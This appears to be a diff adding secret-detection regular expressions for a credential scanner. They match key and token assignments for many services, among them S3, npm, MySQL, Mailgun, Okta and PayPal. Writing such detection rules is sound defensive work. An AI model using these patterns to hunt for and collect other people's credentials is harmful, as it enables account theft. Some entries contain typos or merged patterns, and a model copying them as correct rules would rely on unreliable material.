+ - "(?i)[\"']?scrutinizer[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sauce[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sandbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sandbox[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sacloud[_-]?api[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sacloud[_-]?access[_-]?token[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?sacloud[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?user[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?secret[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?secret[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?key[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?key[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?assets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?app[_-]?logs[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?s3[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?rubygems[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?rtd[_-]?store[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?rtd[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?route53[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ropsten[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?rinkeby[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?rest[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?repotoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?reporting[_-]?webdav[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?reporting[_-]?webdav[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?release[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?release[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?registry[_-]?secure[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?registry[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?rediscloud[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?redis[_-]?stunnel[_-]?urls[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?randrmusicapiaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?rabbitmq[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?quip[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?qiita[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?pypi[_-]?passowrd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?pushover[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?publish[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?publish[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?publish[_-]?access[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?project[_-]?config[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?prod[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?prod[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?prod[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?private[_-]?signing[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?pring[_-]?mail[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?preferred[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?prebuild[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?postgresql[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?postgresql[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?plugin[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?plotly[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?places[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?places[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?pg[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?pg[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?personal[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?personal[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?percy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?percy[_-]?project[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?paypal[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?passwordtravis[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?parse[_-]?js[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?pagerduty[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?packagecloud[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ossrh[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ossrh[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ossrh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ossrh[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ossrh[_-]?jira[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?os[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?os[_-]?auth[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?openwhisk[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?open[_-]?whisk[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?onesignal[_-]?user[_-]?auth[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?onesignal[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?omise[_-]?skey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?omise[_-]?pubkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?omise[_-]?pkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?omise[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?okta[_-]?oauth2[_-]?clientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?okta[_-]?oauth2[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?okta[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ofta[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ofta[_-]?region[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ofta[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?octest[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?octest[_-]?app[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?octest[_-]?app[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?oc[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?object[_-]?store[_-]?creds[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?object[_-]?store[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?object[_-]?storage[_-]?region[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?object[_-]?storage[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?numbers[_-]?service[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?nuget[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?nuget[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?nuget[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?npm[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?npm[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?npm[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?npm[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?npm[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?npm[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?npm[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?now[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?non[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?accesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?node[_-]?env[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ngrok[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ngrok[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?nexuspassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?new[_-]?relic[_-]?beta[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?netlify[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?nativeevents[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mysqlsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mysqlmasteruser[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mysql[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mysql[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mysql[_-]?root[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mysql[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mysql[_-]?hostname[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mysql[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?my[_-]?secret[_-]?env[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?multi[_-]?workspace[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?multi[_-]?workflow[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?multi[_-]?disconnect[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?multi[_-]?connect[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?multi[_-]?bob[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?minio[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?minio[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mile[_-]?zero[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mh[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mg[_-]?public[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mg[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mapboxaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mapbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mapbox[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mapbox[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?manifest[_-]?app[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?manifest[_-]?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mandrill[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?managementapiaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?management[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?manage[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?manage[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mailgun[_-]?secret[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mailgun[_-]?pub[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mailgun[_-]?pub[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mailgun[_-]?priv[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mailgun[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mailgun[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mailgun[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mailer[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mailchimp[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mailchimp[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?mail[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?magento[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?magento[_-]?auth[_-]?username [\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?magento[_-]?auth[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?lottie[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?lottie[_-]?happo[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?lottie[_-]?happo[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?looker[_-]?test[_-]?runner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ll[_-]?shared[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?ll[_-]?publish[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?linux[_-]?signing[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?lighthouse[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?lektor[_-]?deploy[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?lektor[_-]?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?leanplum[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?kxoltsn3vogdop92m[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?kubeconfig[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)[\"']?kubecfg[_-]?s3[_-]?path[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
